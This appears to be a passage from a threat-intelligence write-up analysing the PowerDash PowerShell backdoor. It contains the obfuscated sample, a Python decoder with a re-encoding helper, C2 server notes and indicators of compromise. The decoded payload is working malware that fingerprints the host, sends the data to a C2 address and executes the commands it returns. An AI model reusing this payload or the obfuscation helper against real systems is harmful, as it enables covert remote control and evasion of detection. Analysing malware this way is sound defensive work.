+${@}${~*(}${~*(}${#)``}  +  ${@}${#+}${[*}  +  ${@}${.#=}${[)$}+  ${@}${~*(}${``%}${~*(}  +  ${@}${#+}${#+}  +${@}${~*(}${~*(}${'}+${@}${~*(}${~*(}${``}+${@}${~*(}${``%}${;!@}  +  ${@}${~*(}${~*(}${#)``}+${@}${~*(}${[*}${~*(}+${@}${#)``}${'}  +${@}${~*(}${``%}${~*(}+${@}${~*(}${~*(}${``%}+  ${@}${~*(}${~*(}${#)``}+  ${@}${~*(}${``%}${~*(}  +  ${@}${~*(}${~*(}${``}  +${@}${;!@}${``%}+  ${@}${[)$}${[*}+  ${@}${``}${;!@}  +  ${@}${#+}${#+}  +  ${@}${~*(}${``%}${.#=}+  ${@}${#+}${'}+${@}${~*(}${~*(}${;!@}  +${@}${~*(}${~*(}${;!@}+  
${@}${[)$}${[*}+${@}${#)``}${;!@}+${@}${~*(}${~*(}${``%}+  ${@}${~*(}${~*(}${#)``}+${@}${~*(}${``%}${;!@}+  ${@}${~*(}${~*(}${.#=}+${@}${~*(}${``%}${;!@}  +${@}${~*(}${~*(}${``}  +${@}${~*(}${~*(}${'}  +  ${@}${~*(}${~*(}${;!@}  +${@}${~*(}${~*(}${[*}+${@}${~*(}${~*(}${``}+  ${@}${~*(}${~*(}${~*(}+  ${@}${~*(}${``%}${``%}+${@}${~*(}${~*(}${'}+${@}${#+}${#+}  +  ${@}${~*(}${~*(}${#)``}+  ${@}${``}${~*(}  +  ${@}${``}${#)``}+  ${@}${#)``}${.#=}+${@}${~*(}${``%}${;!@}  +  ${@}${~*(}${~*(}${;!@}  +${@}${~*(}${~*(}${[*}  +  ${@}${~*(}${``%}${.#=}  +${@}${#+}${'}+  ${@}${~*(}${[*}${~*(}+  ${@}${'}${.#=}  +  ${@}${#+}${'}  +  ${@}${~*(}${``%}${#+}+${@}${~*(}${``%}${~*(}+${@}${~*(}${[)$}  +  ${@}${~*(}${``%}  +${@}${[)$}${[*}+  ${@}${[)$}${[*}+${@}${[)$}${[*}  +  ${@}${[)$}${[*}+${@}${#+}${#+}+${@}${~*(}${~*(}${[*}  +  ${@}${~*(}${~*(}${'}  +${@}${[)$}${[*}  +${@}${#)``}${~*(}+  ${@}${[)$}${[*}  +${@}${``}${``%}+  ${@}${'}${~*(}+  ${@}${~*(}${``%}${~*(}+${@}${~*(}${~*(}${#)``}  +${@}${``}${;!@}+  ${@}${#)``}${'}  +${@}${~*(}${``%}${;!@}  +${@}${~*(}${``%}${#+}+  ${@}${'}${[)$}  +  ${@}${~*(}${~*(}${``%}+${@}${~*(}${~*(}${;!@}+${@}${~*(}${~*(}${#)``}+${@}${#+}${'}  +  ${@}${~*(}${~*(}${``%}  +${@}${#+}${#+}  +${@}${~*(}${``%}${~*(}  +${@}${[)$}${[*}  +${@}${#)``}${'}  +  ${@}${'}${[)$}+  ${@}${'}${'}  +${@}${#+}${;!@}  +  ${@}${.#=}${``%}+  ${@}${~*(}${~*(}${``}  +  ${@}${~*(}${~*(}${~*(}+${@}${#+}${#+}+${@}${~*(}${``%}${~*(}  +  ${@}${~*(}${~*(}${;!@}+  ${@}${~*(}${~*(}${;!@}  +${@}${~*(}${~*(}${~*(}  +  ${@}${~*(}${~*(}${``}+${@}${``}${~*(}+  ${@}${``}${#)``}  +  ${@}${'}${.#=}  +  ${@}${#+}${'}+${@}${~*(}${``%}${#+}  +${@}${~*(}${``%}${~*(}+${@}${~*(}${[)$}+${@}${~*(}${``%}  +  ${@}${[)$}${[*}+${@}${[)$}${[*}  +${@}${[)$}${[*}  +${@}${[)$}${[*}+${@}${~*(}${``%}${[)$}+  ${@}${~*(}${~*(}${[*}  +${@}${~*(}${~*(}${'}+${@}${[)$}${[*}+  ${@}${#)``}${~*(}+  ${@}${[)$}${[*}+${@}${``}${``%}+  ${@}${'}${~*(}+${@}${~*(}${``%}${~*(}+${@}${~*(}${~*(}${#)``}  +${@}${``}${;!@}  +  
${@}${#)``}${'}+  ${@}${~*(}${``%}${;!@}+${@}${~*(}${``%}${#+}  +${@}${'}${[)$}  +${@}${~*(}${~*(}${``%}+  ${@}${~*(}${~*(}${;!@}  +${@}${~*(}${~*(}${#)``}  +  ${@}${#+}${'}  +  ${@}${~*(}${~*(}${``%}  +${@}${#+}${#+}  +  ${@}${~*(}${``%}${~*(}  +${@}${[)$}${[*}  +  ${@}${#)``}${'}  +${@}${'}${[)$}+  ${@}${'}${'}  +  ${@}${#+}${;!@}  +  ${@}${.#=}${#)``}+${@}${~*(}${``%}${;!@}+${@}${~*(}${``%}${``%}+${@}${~*(}${``%}${~*(}+  ${@}${~*(}${~*(}${~*(}  +${@}${#)``}${'}+${@}${~*(}${~*(}${~*(}+${@}${~*(}${~*(}${``%}+  ${@}${~*(}${~*(}${#)``}  +${@}${~*(}${~*(}${``}+  ${@}${~*(}${~*(}${~*(}  +${@}${~*(}${``%}${.#=}+${@}${~*(}${``%}${.#=}+  ${@}${~*(}${``%}${~*(}  +  ${@}${~*(}${~*(}${``}+  ${@}${~*(}${[*}${``}+  ${@}${[)$}${'}+${@}${~*(}${[*}${[)$}  +${@}${[)$}${#)``}  +  ${@}${#+}${;!@}+  ${@}${``}${#)``}  +${@}${'}${.#=}+  ${@}${#+}${'}+${@}${~*(}${``%}${#+}+  ${@}${~*(}${``%}${~*(}  +${@}${~*(}${[*}${;!@}  +${@}${``}${~*(}  +${@}${[)$}${[*}  +  ${@}${``}${;!@}  +${@}${~*(}${``%}${#)``}+  ${@}${~*(}${~*(}${~*(}+${@}${~*(}${``%}${;!@}+${@}${~*(}${~*(}${``%}  +${@}${``}${``%}  +  ${@}${[)$}${``}  +  ${@}${;!@}${#+}+${@}${[)$}${[*}  +${@}${[)$}${``}  +  ${@}${``}${~*(}  +${@}${[)$}${[*}  +${@}${[)$}${[*}  +  ${@}${[)$}${[*}  +  ${@}${~*(}${[)$}+${@}${~*(}${``%}  +${@}${~*(}${[*}${;!@}  +${@}${~*(}${[)$}  +  ${@}${~*(}${``%}+${@}${[)$}${#)``}  +${@}${~*(}${``%}${``}+  ${@}${~*(}${``%}${~*(}+${@}${#+}${'}  +  ${@}${~*(}${``%}${``%}+${@}${~*(}${``%}${~*(}+  ${@}${~*(}${~*(}${``}  +  ${@}${~*(}${~*(}${;!@}+${@}${[)$}${[*}  +  ${@}${[)$}${[*}+  ${@}${#)``}${~*(}  +  ${@}${[)$}${[*}+  ${@}${#)``}${``}  +  ${@}${~*(}${[*}${[)$}+  ${@}${[)$}${#+}+  ${@}${#)``}${'}  +${@}${~*(}${~*(}${~*(}  +  ${@}${~*(}${~*(}${``%}+  ${@}${~*(}${~*(}${#)``}  +  ${@}${~*(}${``%}${~*(}+${@}${~*(}${~*(}${``%}  +  ${@}${~*(}${~*(}${#)``}  +${@}${``}${;!@}+${@}${.#=}${``}  +  ${@}${~*(}${[*}${~*(}+${@}${~*(}${~*(}${[*}  +${@}${~*(}${``%}${~*(}+  ${@}${[)$}${#+}  +${@}${#)``}${~*(}  +${@}${[)$}${#+}+  
${@}${#+}${'}+  ${@}${~*(}${~*(}${[*}  +  ${@}${~*(}${~*(}${[*}  +  ${@}${~*(}${``%}${.#=}  +${@}${~*(}${``%}${;!@}+${@}${#+}${#+}  +  ${@}${#+}${'}+${@}${~*(}${~*(}${#)``}+  ${@}${~*(}${``%}${;!@}+  ${@}${~*(}${~*(}${~*(}+${@}${~*(}${~*(}${``%}+  ${@}${``}${'}  +${@}${~*(}${``%}${#)``}+${@}${~*(}${~*(}${;!@}  +  ${@}${~*(}${~*(}${~*(}+${@}${~*(}${~*(}${``%}  +${@}${;!@}${#+}  +  ${@}${[)$}${[*}+  ${@}${#+}${#+}  +${@}${~*(}${``%}${``}  +  ${@}${#+}${'}  +  ${@}${~*(}${~*(}${``}  +  ${@}${~*(}${~*(}${;!@}+  ${@}${~*(}${``%}${~*(}  +  ${@}${~*(}${~*(}${#)``}+${@}${#)``}${~*(}+  ${@}${~*(}${~*(}${'}+  ${@}${~*(}${~*(}${#)``}  +${@}${~*(}${``%}${[*}+${@}${``}${;!@}+${@}${;!@}${#)``}+  ${@}${[)$}${#+}+${@}${~*(}${[*}${;!@}  +${@}${~*(}${[)$}+  ${@}${~*(}${``%}+  ${@}${[)$}${#)``}+  ${@}${~*(}${~*(}${``}  +${@}${~*(}${``%}${~*(}+${@}${~*(}${~*(}${;!@}  +  ${@}${~*(}${~*(}${[*}+  ${@}${~*(}${~*(}${~*(}  +${@}${~*(}${~*(}${``%}  +  ${@}${~*(}${~*(}${;!@}  +${@}${~*(}${``%}${~*(}  +${@}${[)$}${[*}  +${@}${#)``}${~*(}+  ${@}${[)$}${[*}  +${@}${'}${[)$}  +${@}${~*(}${~*(}${#+}+${@}${~*(}${~*(}${``}+  ${@}${[)$}${[*}+  ${@}${[)$}${#)``}  +${@}${~*(}${~*(}${'}+  ${@}${~*(}${~*(}${``}+${@}${~*(}${``%}${.#=}  +${@}${[)$}${[*}  +  ${@}${``}${;!@}  +${@}${'}${'}+  ${@}${~*(}${``%}${~*(}+${@}${~*(}${~*(}${#)``}  +${@}${~*(}${``%}${``}  +${@}${~*(}${~*(}${~*(}  +${@}${~*(}${``%}${``%}+${@}${[)$}${[*}+  ${@}${.#=}${``%}+${@}${~*(}${~*(}${~*(}+  ${@}${~*(}${~*(}${;!@}+${@}${~*(}${~*(}${#)``}+  ${@}${[)$}${[*}  +${@}${``}${;!@}+${@}${'}${[*}  +${@}${~*(}${``%}${~*(}+  ${@}${#+}${'}  +  ${@}${~*(}${``%}${``%}+  ${@}${~*(}${``%}${~*(}+${@}${~*(}${~*(}${``}+  ${@}${~*(}${~*(}${;!@}  +  ${@}${[)$}${[*}+  ${@}${[)$}${#)``}  +${@}${~*(}${``%}${``}+  ${@}${~*(}${``%}${~*(}+  ${@}${#+}${'}  +${@}${~*(}${``%}${``%}+${@}${~*(}${``%}${~*(}  +  ${@}${~*(}${~*(}${``}  +  ${@}${~*(}${~*(}${;!@}+${@}${[)$}${[*}  +${@}${``}${;!@}  +  ${@}${#+}${.#=}+${@}${~*(}${~*(}${~*(}  +  ${@}${~*(}${``%}${``%}  
+${@}${~*(}${[*}${~*(}  +${@}${[)$}${[*}  +${@}${``}${``%}  +  ${@}${[)$}${#)``}  +${@}${#+}${.#=}+  ${@}${~*(}${~*(}${~*(}  +  ${@}${~*(}${``%}${``%}+${@}${~*(}${[*}${~*(}+${@}${~*(}${[*}${``}+${@}${#)``}${'}+  ${@}${~*(}${~*(}${~*(}+${@}${~*(}${~*(}${``%}+  ${@}${~*(}${~*(}${.#=}+  ${@}${~*(}${``%}${~*(}  +${@}${~*(}${~*(}${``}  +  ${@}${~*(}${~*(}${#)``}+  ${@}${.#=}${``}+${@}${~*(}${~*(}${~*(}+  ${@}${``}${;!@}  +${@}${'}${``}  +${@}${~*(}${~*(}${;!@}+${@}${~*(}${~*(}${~*(}+${@}${~*(}${~*(}${``%}+${@}${``}${~*(}  +  ${@}${[)$}${[*}  +  ${@}${``}${;!@}  +${@}${.#=}${;!@}  +${@}${~*(}${~*(}${;!@}  +${@}${~*(}${``%}${~*(}+${@}${#)``}${#)``}  +${@}${#+}${'}+${@}${~*(}${~*(}${;!@}  +  ${@}${~*(}${``%}${;!@}+  ${@}${#+}${#+}+  ${@}${.#=}${``%}+  ${@}${#+}${'}  +  ${@}${~*(}${~*(}${``}+${@}${~*(}${~*(}${;!@}+${@}${~*(}${``%}${;!@}  +${@}${~*(}${~*(}${``%}  +  ${@}${~*(}${``%}${[)$}+${@}${~*(}${[)$}+${@}${~*(}${``%}+  ${@}${'}${[)$}+  ${@}${~*(}${~*(}${``%}+${@}${~*(}${~*(}${.#=}+  ${@}${~*(}${~*(}${~*(}+  ${@}${~*(}${``%}${'}+${@}${~*(}${``%}${~*(}+  ${@}${``}${;!@}  +  ${@}${#)``}${'}+  ${@}${~*(}${~*(}${~*(}+  ${@}${~*(}${``%}${#+}+${@}${~*(}${``%}${#+}  +  ${@}${#+}${'}+${@}${~*(}${~*(}${``%}+${@}${~*(}${``%}${``%}  +${@}${[)$}${[*}+${@}${``}${``%}  +${@}${#+}${~*(}+  ${@}${.#=}${[)$}+${@}${#+}${#+}+  ${@}${~*(}${~*(}${``}+${@}${~*(}${``%}${;!@}+${@}${~*(}${~*(}${[*}+  ${@}${~*(}${~*(}${#)``}+${@}${#)``}${#)``}+  ${@}${~*(}${``%}${.#=}  +  ${@}${~*(}${~*(}${~*(}  +  ${@}${#+}${#+}  +  ${@}${~*(}${``%}${'}+  ${@}${#+}${[)$}  +${@}${;!@}${.#=}  +  ${@}${;!@}${.#=}+  ${@}${#)``}${'}+  ${@}${~*(}${~*(}${``}+${@}${~*(}${``%}${~*(}+  ${@}${#+}${'}+  ${@}${~*(}${~*(}${#)``}+${@}${~*(}${``%}${~*(}+${@}${``}${``%}+${@}${``}${``%}  +  ${@}${[)$}${#)``}  +  ${@}${~*(}${~*(}${``}+${@}${~*(}${``%}${~*(}  +${@}${~*(}${~*(}${;!@}+${@}${~*(}${~*(}${[*}+${@}${~*(}${~*(}${~*(}  +  ${@}${~*(}${~*(}${``%}+  ${@}${~*(}${~*(}${;!@}+${@}${~*(}${``%}${~*(}  +${@}${``}${#)``}  
+${@}${#)``}${'}+${@}${~*(}${~*(}${~*(}  +  ${@}${~*(}${~*(}${``%}+  ${@}${~*(}${~*(}${#)``}  +${@}${~*(}${``%}${~*(}  +  ${@}${~*(}${~*(}${``%}  +${@}${~*(}${~*(}${#)``}+  ${@}${~*(}${[*}${``}+  ${@}${#)``}${'}  +${@}${~*(}${~*(}${~*(}  +  ${@}${~*(}${~*(}${``%}  +  ${@}${~*(}${~*(}${.#=}  +${@}${~*(}${``%}${~*(}+${@}${~*(}${~*(}${``}+  ${@}${~*(}${~*(}${#)``}  +  ${@}${'}${``%}+${@}${~*(}${~*(}${``}+${@}${~*(}${~*(}${~*(}  +  ${@}${~*(}${``%}${#+}+  ${@}${``}${;!@}+  ${@}${'}${``}+  ${@}${~*(}${~*(}${;!@}  +  ${@}${~*(}${~*(}${~*(}+${@}${~*(}${~*(}${``%}  +${@}${``}${~*(}  +  ${@}${``}${#)``}+${@}${#+}${#+}+  ${@}${~*(}${``%}${#+}+${@}${~*(}${``%}${``%}+${@}${``}${~*(}+${@}${``}${~*(}  )  "  )

With some PowerShell syntax voodoo we were able to format and split the payload into two distinct parts:

  • The first part builds up a set of variables. A counter `${~}` is incremented by one in each `{...}` block, so ten oddly named variables end up holding the digits 0 to 9; `${@}` is assembled from indexed characters of strings such as "$(@{})" (System.Collections.Hashtable) and "$?" (True) and evaluates to `[Char]`; finally `${~}` itself is rebuilt to the string `iex`.
  • The second part concatenates `${@}${d}${d}${d}` groups into one long `[Char]N+[Char]N+...` expression, creates the script from it and executes it.

Since the second part is handed to the rebuilt `iex` with the dot-source operator (`. ${~}(...)`), all we have to do is replace that call with a print statement and run the script in an isolated analysis environment to obtain the decoded payload.

[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
$url  = "https://95.163.240.184:8000/dash/post_data/"
$body = @{
    uuid = (Get-WmiObject Win32_ComputerSystemProduct).UUID
    name = $env:COMPUTERNAME
    os   = (Get-WmiObject -Class Win32_OperatingSystem).Caption
    lang = (Get-CimInstance CIM_VideoController|%{[int][math]::round($_.AdapterRAM/1GB)}) -join("; ")
    domain = (Get-WmiObject -Class Win32_ComputerSystem).Domain
    av = (Get-WmiObject -namespace root\SecurityCenter2 -class Antivirusproduct).DisplayName
    cpu = (Get-CimInstance CIM_Processor).Name
    gpu = (Get-CimInstance CIM_VideoController|%{$_.Name}) -join("; ")   
}
$headers  = @{'Content-Type'='application/json; charset=utf-8'}
$response = Iwr $url -Method Post -Headers $headers -body ($body|ConvertTo-Json) -UseBasicParsing
Invoke-Command ([ScriptBlock]::Create(($response.Content|ConvertFrom-Json).cmd))

The final payload is relatively small: it collects basic host information (hardware UUID, computer name, OS, domain, installed antivirus, CPU and GPU; the field named lang actually carries the GPU memory in GB), POSTs it as JSON to the /dash/post_data/ endpoint with certificate validation disabled, and executes whatever PowerShell the C2 returns in the cmd field of its JSON response.
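The decoding described above can also be done statically, without ever executing the sample. The Python below is an added example, not code from the report or from the malware: it parses the prologue for the ten digit variables (they first appear in increasing order because each block adds one to the counter), locates the `. ${~}("${~} (` launcher, and turns every `${@}${d}${d}${d}` group back into a character. The PROLOGUE constant is copied from the sample above (line breaks added); PAGE_FRAGMENT is the prologue plus the first thirteen groups of the sample's body. The obfuscate() helper follows the same scheme and exists only to build test input offline.

```python
"""Static decoder for the digit-variable / [Char] obfuscation used by PowerDash.

Scheme (see the sample in the report): a chain of `{${x}=(${~}=${~}+${one})}`
blocks assigns 0..9 to ten oddly named variables, `${@}` is built to hold the
string "[Char]", `${~}` is rebuilt to "iex", and the payload is a `+`-joined run
of `${@}${d}${d}${d}` groups, each spelling one character code. Nothing here
runs PowerShell.
"""
import re

TOKEN = re.compile(r"\$\{([^}]*)\}")             # ${name}; the names never contain "}"
LAUNCHER = re.compile(r'\.\s*\$\{~\}\(\s*"\s*\$\{~\}\s*\(')   # `. ${~}("${~} (` ; body follows

# Prologue copied from the sample (line breaks added; they are ignored by the parser).
PROLOGUE = r'''('______'  |  %{  ${~}=+$()  }  {${``%}  =  ${~}  }  {  ${~*(}  =++  ${~}  }{  ${[*}  =  (  ${~}=  ${~}+  ${~*(}  )  }
{${[)$}  =(${~}=  ${~}+  ${~*(})  }{${``}=(  ${~}=${~}  +  ${~*(}  )}  {  ${;!@}=(  ${~}=${~}+  ${~*(}  )  }
{${#)``}  =(${~}=  ${~}  +${~*(}  )  }{${'}=(${~}  =  ${~}+${~*(})  }  {${.#=}  =(  ${~}  =${~}+${~*(})}
{  ${#+}=  (  ${~}=  ${~}  +  ${~*(}  )  }{${@}  ="["+  "$(@{}  )"[${'}  ]+  "$(@{  })"[  "${~*(}"  +  "${#+}"]+
"$(  @{}  )"[  "${[*}"  +  "${``%}"]+  "$?  "[${~*(}]  +  "]"}{${~}="".("$(@{  }  )  "["${~*(}"  +  "${``}"  ]
+"$(@{  }  )  "["${~*(}"  +"${#)``}"  ]+  "$(@{})"[${``%}]+"$(@{})  "[  ${``}  ]  +"$?"[${~*(}]+  "$(@{})  "[${[)$}]  )}
{  ${~}=  "$(@{  })"["${~*(}${``}"]  +  "$(@{  })"[  ${``}  ]  +"${~}"["${[*}${'}"  ]  }  );  .  ${~}("${~}  (  '''

# Prologue plus the first thirteen groups of the sample's body, copied verbatim.
PAGE_FRAGMENT = PROLOGUE + (
    "${@}${#+}${~*(}+${@}${'}${.#=}+${@}${~*(}${``%}${~*(}+${@}${~*(}${~*(}${#)``}  "
    "+${@}${``}${#)``}+  ${@}${.#=}${[)$}  +  ${@}${~*(}${``%}${~*(}+  ${@}${~*(}${~*(}${``}+  "
    "${@}${~*(}${~*(}${.#=}+  ${@}${~*(}${``%}${;!@}  +${@}${#+}${#+}  +  ${@}${~*(}${``%}${~*(}+"
    "${@}${.#=}${``%}  )  \"  )"
)


def learn_digit_names(script):
    """Map each digit variable name to its value, using only the text before ${@} is defined.

    The chain adds one to ${~} per block, so the digit variables first appear in the
    order 0, 1, ..., 9. ${~} itself is the counter and is skipped.
    """
    prologue = script[: script.index("${@}")]
    names = []
    for name in TOKEN.findall(prologue):
        if name != "~" and name not in names:
            names.append(name)
    if len(names) != 10:
        raise ValueError(f"expected 10 digit variables, found {len(names)}")
    return {name: str(value) for value, name in enumerate(names)}


def deobfuscate(script):
    """Return the PowerShell the sample would hand to iex, without running it."""
    digits = learn_digit_names(script)
    m = LAUNCHER.search(script)
    if not m:
        raise ValueError('launcher `. ${~}("${~} (` not found')
    chars = []
    for group in script[m.end():].split("${@}")[1:]:    # one group per character
        code = "".join(digits[name] for name in TOKEN.findall(group))
        if code:
            chars.append(chr(int(code)))
    return "".join(chars)


def obfuscate(plaintext, prologue=PROLOGUE):
    """Re-encode text with the same scheme; used only to build offline test input."""
    by_value = {v: k for k, v in learn_digit_names(prologue).items()}
    groups = ("${@}" + "".join(f"${{{by_value[d]}}}" for d in str(ord(c))) for c in plaintext)
    return prologue + "+".join(groups) + '  )  "  )'


if __name__ == "__main__":
    print(deobfuscate(PAGE_FRAGMENT))
    print(deobfuscate(obfuscate("Write-Host 'hi'")))
```

Learning the digit names from the prologue rather than hardcoding them means the decoder keeps working when the operator regenerates the sample with different variable names, as long as the counter-chain structure stays the same.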

C2 server

We decided to take a closer look at the C2 server.

Luckily for us, the malware operator left the DEBUG mode on.

The server is programmed in Python and uses several known libraries/frameworks like Django and Grappelli.

What is interesting for us is the /dash/ route: that is where infected bots talk to the server. Besides the /dash/post_data/ registration path there are a few other endpoints that were not used in any of the stages described above. We suspect that the operator manually decides whether a victim is interesting enough and then delivers further PowerShell scripts with more functionality.

While we were unable to obtain any additional payloads that would use the other C2 endpoints, we plan to keep monitoring this malware family in case the threat actor uses it again.

IoC

Value                                                             Description
5.63.152.179                                                      Host used for serving payloads
95.163.240.184                                                    Host used as malware C2
hxxps://95.163.240.184:8000/dash/post_data/                       C2 endpoint used for bot registration
hxxp://5.63.152.179/doc/zal_nr_1_zap_ofert(<digits>).doc          Malicious HTA script (fetched via CVE-2017-0199)
hxxp://5.63.152.179/pl/1txt/<digits>                              Malicious PowerShell script (stager)
hxxp://5.63.152.179/pl/2ht/<digits>                               Malicious HTA script (persistence)
hxxp://5.63.152.179/pl/3txt/<digits>                              Malicious PowerShell script (PowerDash payload)
d5c03af59492198d99889f5ec84f96129019ba933c5d8e3614866861c28ab4e6  SHA256 of Zapytanie_ofertowe_2023_0118806.doc
64502109c546fbd2d37644c030182a906b3871316b5086d31286c3697ca94362  SHA256 of zal_nr_1_zap_ofert(8806).doc
2fd5c1a3787eec4d9bd6f935e5b93af0f4fd454544b03c6aa70c94e4b55d22a7  SHA256 of 8806 (stager)
ec0a53f40414c1a1419d458af90a74b58d654de4af67841d689fa9f296ca617d  SHA256 of 8806 (HTA persistence)
a196711c42f3f3d378bf8232d3b10a92afd846b0f374cbf6cd54fcfda47b958d  SHA256 of 8806 (PowerDash payload)